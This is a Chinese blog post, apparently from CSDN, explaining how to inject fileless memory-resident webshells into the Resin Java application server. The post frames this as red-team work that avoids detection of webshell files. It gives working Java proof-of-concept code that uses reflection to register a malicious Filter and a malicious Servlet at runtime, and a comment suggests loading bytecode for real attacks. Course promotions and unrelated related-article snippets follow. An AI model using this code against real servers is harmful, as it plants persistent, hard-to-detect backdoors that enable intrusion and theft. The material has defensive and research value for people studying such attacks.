Resin内存马逆袭之路

最新推荐文章于 2023-05-18 13:48:29 发布
最新推荐文章于 2023-05-18 13:48:29 发布
阅读量359 收藏
点赞数
文章标签: servlet java intellij-idea
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text2203/article/details/128964678
版权

前言

故事还是要从很久很久以前说起,红蓝对抗越来越激烈,常见的免杀Webshell文件已经逃脱不了蓝队大佬的火眼金睛了,函数混淆的花里胡哨最后还是能被轻松分析,所以早在很多年前,就已经进入了内存马的时代,内存马是一种新的无文件的Webshell类型。市面常见的内存马都是针对Tomcat、Spring的,直到有一天我遇到了某微,落地的Webshell文件被乱揍,于是开启了Resin内存马学习之路。

关于Resin

首先了解一下Resin是个啥,Resin是CAUCHO公司的产品,是一个Application
Server,支持Servlet和JSP的引擎,速度非常快,并且可以和Apache、IIS等其他WEB服务器一起工作,也支持负载均衡,所以许多站点都是使用该WEB服务器构建的。

调试环境搭建

IDEA:2022.2

Resin:4.0.58

JDK:JDK8u261

工欲善其事必先利其器,先本地搭建环境调试一下,搭建环境发现官方的下载地址各种被Ban,不明所以,不过最后还是搞到了包。

IDEA直接创建Resin,如果没有的,去IDEA装一个Resin的插件就好了,Configuration选择我们下载好的Resin环境包。

image.png

后面生成一个war包就好了。

image.png

导入resin/lib,方便我们后面调试。

image.png

修改resin/conf/resin.xml文件中的<web-app id="/" root- directory="绝对路径"/>,修改一下默认解析目录。

IDEA启动。

image.png

分析过程

常见的动态注册内存马有Listen、Filter、Servlet几种方式,不管是哪种内存马都需要先获取上下文对象,上下文对象需要通过request获取,一般request会存储在当前线程对象中。

Filter

Tomcat等一般都可以通过javax.servlet.ServletRequest.getServletContext()方法直接获取,但是Resin行不通,那就先看在Resin的堆栈翻一下。

doFilter:19, Main (com.test)
doFilter:89, FilterFilterChain (com.caucho.server.dispatch)
doFilter:156, WebAppFilterChain (com.caucho.server.webapp)
doFilter:95, AccessLogFilterChain (com.caucho.server.webapp)
service:304, ServletInvocation (com.caucho.server.dispatch)
handleRequest:840, HttpRequest (com.caucho.server.http)
dispatchRequest:1367, TcpSocketLink (com.caucho.network.listen)
handleRequest:1323, TcpSocketLink (com.caucho.network.listen)
handleRequestsImpl:1307, TcpSocketLink (com.caucho.network.listen)
handleRequests:1215, TcpSocketLink (com.caucho.network.listen)
handleAcceptTaskImpl:1011, TcpSocketLink (com.caucho.network.listen)
runThread:117, ConnectionTask (com.caucho.network.listen)
run:93, ConnectionTask (com.caucho.network.listen)
handleTasks:175, SocketLinkThreadLauncher (com.caucho.network.listen)
run:61, TcpSocketAcceptThread (com.caucho.network.listen)
runTasks:173, ResinThread2 (com.caucho.env.thread2)
run:118, ResinThread2 (com.caucho.env.thread2)

找到service:304, ServletInvocation (com.caucho.server.dispatch)

image.png

com.caucho.server.dispatch.ServletInvocation#getContextRequest()可以获得一个ServletRequest对象。image.png

通过反射获取一下ServletRequest对象。

ServletRequest request = (ServletRequest) Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.dispatch.ServletInvocation").getMethod("getContextRequest").invoke(null);

下面就需要找哪里可以动态注册恶意Filter了,再看一下堆栈信息,这里有WebApp属性包含了_filterManager_filterMapper

image.png

image.png

WebAPP的类继承关系,WebApp最终还是继承自ServletContext我们可以强转子类,将ServletContext强转成WebApp

image.png

image.png

获取WebApp对象。

WebApp webApp = (WebApp) request.getClass().getMethod("getWebApp").invoke(request);

看一下_filterManager包含_filters以Map形式存储FilterConfigImpl对象,_urlPatterns存储了,Filter名和Filter对应的URL。

image.png

URLPattern对象可以通过FilterMapping#createUrlPattern()获取。

image.png

FilterMapping.URLPattern urlPattern = filterMapping.createUrlPattern();
            urlPattern.addText(url);

_filterMap以List的形式存储FilterMapping对象,FilterMapping存储着URL和filter的对应关系。

image.png

//获取_filtermanager
            Field filtermanager_field = webApp.getClass().getDeclaredField("_filterManager");
            filtermanager_field.setAccessible(true);
            FilterManager filterManager = (FilterManager) filtermanager_field.get(webApp);
            //获取_filters
            Field filters_field = filterManager.getClass().getDeclaredField("_filters");
            filters_field.setAccessible(true);
            HashMap<String, FilterConfigImpl> filters = (HashMap<String, FilterConfigImpl>) filters_field.get(filterManager);

image.png

POC
public class TestFilter extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse res) {
        String filtername = "FilterShell";
        String url = "/filter";
        Class clzz;
        try {
            //获取request对象
            ServletRequest request = (ServletRequest) Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.dispatch.ServletInvocation").getMethod("getContextRequest").invoke(null);
            //获取webapp
            WebApp webApp = (WebApp) request.getClass().getMethod("getWebApp").invoke(request);
//            //获取_filtermanager
//            Field filtermanager_field = webApp.getClass().getDeclaredField("_filterManager");
//            filtermanager_field.setAccessible(true);
//            FilterManager filterManager = (FilterManager) filtermanager_field.get(webApp);
//            //获取_filters
//            Field filters_field = filterManager.getClass().getDeclaredField("_filters");
//            filters_field.setAccessible(true);
//            HashMap<String, FilterConfigImpl> filters = (HashMap<String, FilterConfigImpl>) filters_field.get(filterManager);
            clzz = Thread.currentThread().getContextClassLoader().loadClass("com.test.Evil");       //方便调试,实战换成defineClass加载字节码
            FilterMapping filterMapping = new FilterMapping();
            filterMapping.setFilterClass(clzz.getName());
            filterMapping.setFilterName(filtername);
            FilterMapping.URLPattern urlPattern = filterMapping.createUrlPattern();
            urlPattern.addText(url);
            webApp.addFilterMapping(filterMapping);
            res.getWriter().write("Resin Filter Inject Success!!");
        } catch (Exception ignored) {
        }
    }
}

Servlet

获取request对象过程复用上面Filter的。

ServletRequest request = (ServletRequest) Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.dispatch.ServletInvocation").getMethod("getContextRequest").invoke(null);

自实现一个Servlet,看一下调用栈中的几个关键属性_serlvetName_servletClassName_servletClass_urlPatterns

doGet:20, TestServlet (com.test)
service:120, HttpServlet (javax.servlet.http)
service:97, HttpServlet (javax.servlet.http)
doFilter:109, ServletFilterChain (com.caucho.server.dispatch)
doFilter:156, WebAppFilterChain (com.caucho.server.webapp)
doFilter:95, AccessLogFilterChain (com.caucho.server.webapp)
service:304, ServletInvocation (com.caucho.server.dispatch)
handleRequest:840, HttpRequest (com.caucho.server.http)
dispatchRequest:1367, TcpSocketLink (com.caucho.network.listen)
handleRequest:1323, TcpSocketLink (com.caucho.network.listen)
handleRequestsImpl:1307, TcpSocketLink (com.caucho.network.listen)
handleRequests:1215, TcpSocketLink (com.caucho.network.listen)
handleAcceptTaskImpl:1011, TcpSocketLink (com.caucho.network.listen)
runThread:117, ConnectionTask (com.caucho.network.listen)
run:93, ConnectionTask (com.caucho.network.listen)
handleTasks:175, SocketLinkThreadLauncher (com.caucho.network.listen)
run:61, TcpSocketAcceptThread (com.caucho.network.listen)
runTasks:173, ResinThread2 (com.caucho.env.thread2)
run:118, ResinThread2 (com.caucho.env.thread2)

image.png

image.png

还是先获取WebApp

WebApp webApp = (WebApp) request.getClass().getMethod("getWebApp").invoke(request);

ServletMapping存储着URL和Servlet的对应关系。

image.png

动态添加思路类似Filter。

ServletMapping servletMapping = new ServletMapping();
            servletMapping.addURLPattern(url);
            servletMapping.setServletName(servletname);
            clazz = Thread.currentThread().getContextClassLoader().loadClass("com.test.Evil");
            servletMapping.setServletClass(clazz.getName());
            webApp.addServletMapping(servletMapping);

image.png

POC

public class TestServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse res) throws IOException {
        String servletname = "ServletShell";
        String url = "/servlet";
        Class clazz;
        try {
            ServletRequest request = (ServletRequest) Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.dispatch.ServletInvocation").getMethod("getContextRequest").invoke(null);
            WebApp webApp = (WebApp) request.getClass().getMethod("getWebApp").invoke(request);
            ServletMapping servletMapping = new ServletMapping();
            servletMapping.addURLPattern(url);
            servletMapping.setServletName(servletname);
            clazz = Thread.currentThread().getContextClassLoader().loadClass("com.test.Evil");
            servletMapping.setServletClass(clazz.getName());
            webApp.addServletMapping(servletMapping);
            res.getWriter().write("Resin Servlet Inject Success!!");
        } catch (Exception ignored) {
        }
    }
}


ping.setServletClass(clazz.getName());
webApp.addServletMapping(servletMapping);
res.getWriter().write(“Resin Servlet Inject Success!!”);
} catch (Exception ignored) {
}
}
}

网络安全工程师企业级学习路线

这时候你当然需要一份系统性的学习路线

如图片过大被平台压缩导致看不清的话,可以在文末下载(无偿的),大家也可以一起学习交流一下。

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程:

上述资料【扫下方二维码】就可以领取了,无偿分享

AIGC阿道夫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
resin内存优化
一座孤岛
02-28 184
内存溢出解决办法 找到配置文件并更改(resin.properties)
Resin 中 jvm 内存设置
漫漫长路,憩息港湾.(深水鱼)
07-21 354
resin3.0 及前期版本内存设置, 如下:   unix&gt;  bin/httpd.sh -Xmn100M -Xms500M -Xmx500Mwin&gt;   bin/httpd.exe -Xmn100M -Xms500M -Xmx500Minstall win service&gt; bin/httpd.exe -Xmn100M -Xms500M -Xmx500M -install -...
linux resin 内存溢出,Resin服务器内存修改
weixin_31421601的博客
04-30 281
根据服务器实际内存容量以及具体是Perm溢出还是heap溢出,调整相应的JVM参数。如果是heap溢出,调整-Xms参数和-Xmx参数,建议二者配成相同数值。如果是PermGen内存溢出,调整-XX:PermSize参数和-XX:MaxPermSize参数,建议二者配成相同数值。Resin 4.x版本与 3.x版本的配置有所不同,下面分别予以说明:Resin 3.x内存调整打开Resin 3.x安...
resin服务器内存溢出(OutOfMemoryError)解决方法
wjs7740的专栏
08-04 4133
导致OutOfMemoryError异常的常见原因有以下几种: 内存中加载的数据量过于庞大,如一次从数据库取出过多数据;集合类中有对对象的引用,使用完后未清空,使得JVM不能回收;代码中存在死循环或循环产生过多重复的对象实体;使用的第三方软件中的BUG;启动参数内存值设定的过小; 此错误常见的错误提示: tomcat:java.lang.OutOfMemoryError: Per
resin出现"WarningService: Shutdown: TcpSocketLink OutOfMemory"解决方法
老焦的blog-奋斗12年IT虫子所思所想所感
04-11 1290
近几日,resin总是惠莫民奇妙的重启,而且没有规律,log里面报错信息如下 :   "WarningService: Shutdown: TcpSocketLink OutOfMemory"   操作系统:ubutu resin版本:4.0.32 错误描述: 在log日志中出现: "WarningService: Shutdown: TcpSocketLink OutOfMe...
resin内存益出后自动重启
02-12
resin内存益出后自动重启的方案,给新学者提供些解决方案。
resin3 和 resin4
08-15
3. **内存管理**:Resin3采用了高效的内存管理策略,降低了内存泄漏的风险。 4. **线程池管理**:通过线程池,Resin3能够有效地调度和复用线程,提高系统资源利用率。 5. **负载均衡与集群**:支持多服务器间的负载...
Resin-install.rar_resin_resin install
09-23
Resin以其快速启动、低内存占用和高性能而闻名。 2. **安装Resin**:Resin的安装过程相对简单。首先,从官方网站或提供的压缩包中下载Resin的安装文件,解压到指定目录。然后,根据操作系统(Windows、Linux、Mac等...
resin-3.1.10
08-10
8. **内存管理**:Resin使用智能的内存管理策略,如分代垃圾回收,以减少停顿时间并提高性能。 9. **安全特性**:Resin支持基本的认证、授权和SSL加密,确保Web应用的安全性。 10. **日志和监控**:Resin提供了...
泛微OA安装resin服务
12-18
可直接双击运行,如安装失败,请右击,以系统管理员身份运行。
项目运行的服务器:Resin-4.0.58
04-19
名称:Resin,版本:4.0.58,系统:Windows,位数:64 项目运行的服务器:Resin-4.0.58
查看jvm线程日志
iyangijava的博客
12-25 4422
这个命令能看到端口对应的pid sudo netstat -lunpt | grep 8080  查看线程日志 ./jstack 10303 即可  如果想把 内容打印到 文本里 即 ./jstack pid &gt;111.log  打印 到 111.log文件 中 2018-12-25 10:30:32 Full thread dump Java HotSpot(TM) 64-Bit S...
初探Hessian利用链为Dubbo-CVE占坑
Q54665642ljf的博客
09-12 316
Hessian 是caucho公司的工程项目,为了达到或超过 ORMI/Java JNI 等其他跨语言/平台调用的能力设计而出,在 2004 点发布 1.0 规范,一般称之为 Hessian ,并逐步迭代,在 Hassian jar 3.2.0 之后,采用了新的 2.0 版本的协议,一般称之为 Hessian 2.0。这是一种动态类型的二进制序列化和Web 服务协议,专为面向对象的传输而设计。
resin版本查看
滕青山博客
10-27 805
(2)运行resin.jar包中的com.caucho.Version类。(1)找到resin安装目录,进入lib目录。可以看到我的版本是Resin-4.0.58。
jvm调优
m0_47741224的博客
01-19 129
然而,这个建议是不管使用的GC算法的,值得一提的是,当使用CMS收集器时,系统GC将是一件很不幸的事,因为它默认会触发一次Full GC。然而,请记住大多数情况下,JVM比我们自己能作出更好的垃圾收集决策。需要注意的是,年轻代和年老代垃圾收集的统计数据是分开计算的,还要注意,默认情况下,最大暂停时间没有被设置。例如,如果4个以服务器方式运行的JVM同时跑在在一个具有16核处理器的机器上,设置-XX:ParallelGCThreads=4是明智的,它能使不同JVM的垃圾收集器不会相互干扰。
安全运维之Resin应用服务器中间件安装使用与安全配置
WeiyiGeek 唯一极客IT知识分享
10-28 1714
本章目录:0x00 快速入门0x01 Resin安装0x02 Resin配置文件0x03 Resin应用0x04 Security0x05 Help | 附录补充(1) Resin 日志记录之format配置详解原文地址: https://www.bilibili.com/read/cv135806960x00 快速入门描述:Resin是 CAUCHO 公司(http:/...
Tomcat和Resin有什么区别,工作中你怎么选择?
Small_Casee的博客
05-18 734
在选择Tomcat或Resin作为Web服务器时,需要根据具体的需求和项目要求进行判断。如果你需要高性能和可伸缩性的商业解决方案,可以考虑使用Resin。Tomcat是Apache基金会的一个开源项目,其设计注重于作为Servlet容器,通常与Apache HTTP服务器配合使用来处理动态请求。在我的工作中,我会先根据项目要求和性能要求进行调研、评估,然后结合预算和团队能力,选择最适合项目的Web服务器。Tomcat和Resin都是Java Web服务器,主要区别在于它们的设计和实现方面。
windows安装resin
最新发布
09-14
在Windows操作系统下安装Resin的步骤如下: 1. 打开Resin安装文件夹,在根目录下找到stepup.exe,并双击启动。 2. 在stepup.exe的第一行中填入你的Resin安装路径。 3. 确保你已经正常安装了JDK(Java Development ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值